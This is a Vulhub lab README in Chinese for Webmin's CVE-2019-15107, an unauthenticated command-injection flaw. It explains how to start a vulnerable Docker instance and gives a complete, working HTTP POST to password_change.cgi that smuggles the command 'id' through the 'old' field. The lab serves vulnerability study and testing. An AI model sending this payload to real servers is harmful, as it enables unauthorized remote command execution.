Files
vulhub/webmin/CVE-2019-15107/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

44 lines
1.5 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Webmin 远程命令执行漏洞CVE-2019-15107
Webmin是一个用于管理类Unix系统的管理配置工具具有Web页面。在其找回密码页面中存在一处无需权限的命令注入漏洞通过这个漏洞攻击者即可以执行任意系统命令。
参考链接:
- https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
- https://www.exploit-db.com/exploits/47230
- https://blog.firosolutions.com/exploits/webmin/
## 环境搭建
执行如下命令启动webmin 1.910
```
docker compose up -d
```
执行完成后,访问`https://your-ip:10000`忽略证书后即可看到webmin的登录页面。
## 漏洞复现
参考链接中的数据包是不对的经过阅读代码可知只有在发送的user参数的值不是已知Linux用户的情况下而参考链接中是`user=root`),才会进入到修改`/etc/shadow`的地方,触发命令注入漏洞。
发送如下数据包,即可执行命令`id`
```
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
```
![](1.png)